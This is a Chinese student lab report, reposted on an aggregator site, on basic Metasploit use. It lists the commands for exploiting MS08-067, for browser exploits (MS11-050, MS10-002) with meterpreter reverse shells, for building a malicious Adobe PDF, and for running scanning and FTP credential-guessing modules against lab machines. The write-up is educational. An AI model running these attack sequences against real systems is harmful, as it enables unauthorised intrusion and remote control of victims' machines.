20155227《网络对抗》Exp5 MSF基础应用
生活随笔
收集整理的這篇文章主要介紹了
20155227《网络对抗》Exp5 MSF基础应用
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
20155227《網絡對抗》Exp5 MSF基礎應用
基礎問題回答
用自己的話解釋什么是exploit,payload,encode
exploit:把實現設置好的東西送到要攻擊的主機里。
payload:用來攻擊的代碼、程序等。
encode:編碼方式,讓被傳輸的東西變得更不易被發現。
實驗步驟
1.主動攻擊:ms08_067
- 首先,先用search ms08_067查詢一下針對該漏洞的攻擊模塊:
- 用use exploit/windows/smb/ms08_067_netapi使用該模塊
- 輸入命令show payloads會顯示出有效的攻擊載荷
- 使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷
- 輸入命令set LHOST "kali Ip" set RHOST "Win xp Ip"
- 使用命令show options查看payload狀態
- 輸入命令exploit開始攻擊,攻擊成功
- 在kali上執行ipconfig/all:
- 在win xp上執行ipconfig/all:
發現二者結果相同,說明成功攻擊.
還可以進行MS08_067遠程漏洞攻擊實踐:meterpreter:
2.對瀏覽器攻擊:MS11_050漏洞滲透攻擊/MS10-002漏洞攻擊
- 先利用search ms11_050指令查看可以運用的攻擊模塊
- 使用use windows/browser/ms11_050_mshtml_cobjectelement模塊:
- 用info查看該模塊的信息:
- 用set payload windows/meterpreter/reverse_tcp設置payload,并設置需要設置的參數。
- 用show options確認需要設置的參數是否已經設置好:
- 確認參數設置無誤后,用exploit指令開始攻擊,攻擊成功后會有靶機需要訪問的網址:
- 在靶機IE上輸入該網址出現404not found的錯誤:
因為靶機上的IE版本不符合可攻擊的版本,所以無法攻擊成功。
之后換成了狄惟佳同學提供的IE,在IE中輸入網址,查看內容:
但是很快,IE出現彈窗,警告遇到問題需關閉程序。
之后我又嘗試了win7下的IE8,也是同樣的結果,一輸入網址IE就自動關閉。參考了狄同學的博客,修改了IE的安全設置,結果還是不行。
- 我又嘗試了成功攻擊的同學使用的方法:MS10-002漏洞攻擊,同樣設置參數后exploit,在靶機IE中輸入網址,此時kali中可以看到有目標主機上線,會話建立。
- 輸入sessions -i 1,成功獲取靶機的shell,可以對其進行操作:
3.針對客戶端的攻擊:adobe_toolbutton
- 在kali終端中開啟msfconsole
- 輸入命令use exploit/windows/fileformat/adobe_cooltype_sing,進入該漏洞模塊的使用
- 使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷
- 設置相關數據:
- show options:
- 輸入exploit,生成pdf文件,并可以看到pdf所在文件夾,將pdf復制到靶機里:
- 使用use exploit/multi/handler新建監聽模塊(和前幾次實驗一樣)
- 使用命令exploit開始攻擊,在靶機中打開pdf,攻擊成功:
4.成功應用任何一個輔助模塊
4.1 scanner/http/dir_scanner
- 用show auxiliary查看所有輔助模塊,并選擇其中的一個,我使用的是scanner/http/dir_scanner掃描網站目錄。
- 查看需要設置的參數,設置完成后確認一下,然后就可以開始exploit了:
- 可以進行對單一目標主機的掃描,也可以對指定網段的主機進行掃描:
4.2 auxiliary/scanner/ftp/ftp_login
- 選擇ftp_login模塊,掃描網段192.168.115.1-10中能使用固定用戶名和密碼root/123456登陸主機:
- 查看輸出結果,可以看出在這10個IP中沒有FTP Server使用root/123456賬號登陸。通常在公司或學校內網里,很多人習慣使用簡單的賬號,沒有足夠的安全意識,當攻擊者成功入侵內網后,這些工作站將非常危險。
離實戰還缺些什么技術或步驟?
實戰的時候要結合靶機的具體環境考慮。
實驗體會
Metasploit提供了豐富的掃描功能、攻擊腳本及二次開發的平臺,使網絡安全漏洞檢測變得相對容易。在這次實驗過程中我走的彎路較少。具體來說就是先尋找可攻擊的漏洞、再根據漏洞名和所屬目錄猜測漏洞攻擊的方面、再查看漏洞的詳細信息、再設置一系列參數、最后實施攻擊并查看攻擊結果。
轉載于:https://www.cnblogs.com/guyanlin/p/8876851.html
總結
以上是生活随笔為你收集整理的20155227《网络对抗》Exp5 MSF基础应用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 电路分析-1
- 下一篇: oracle 添加登陆数据库触发器--记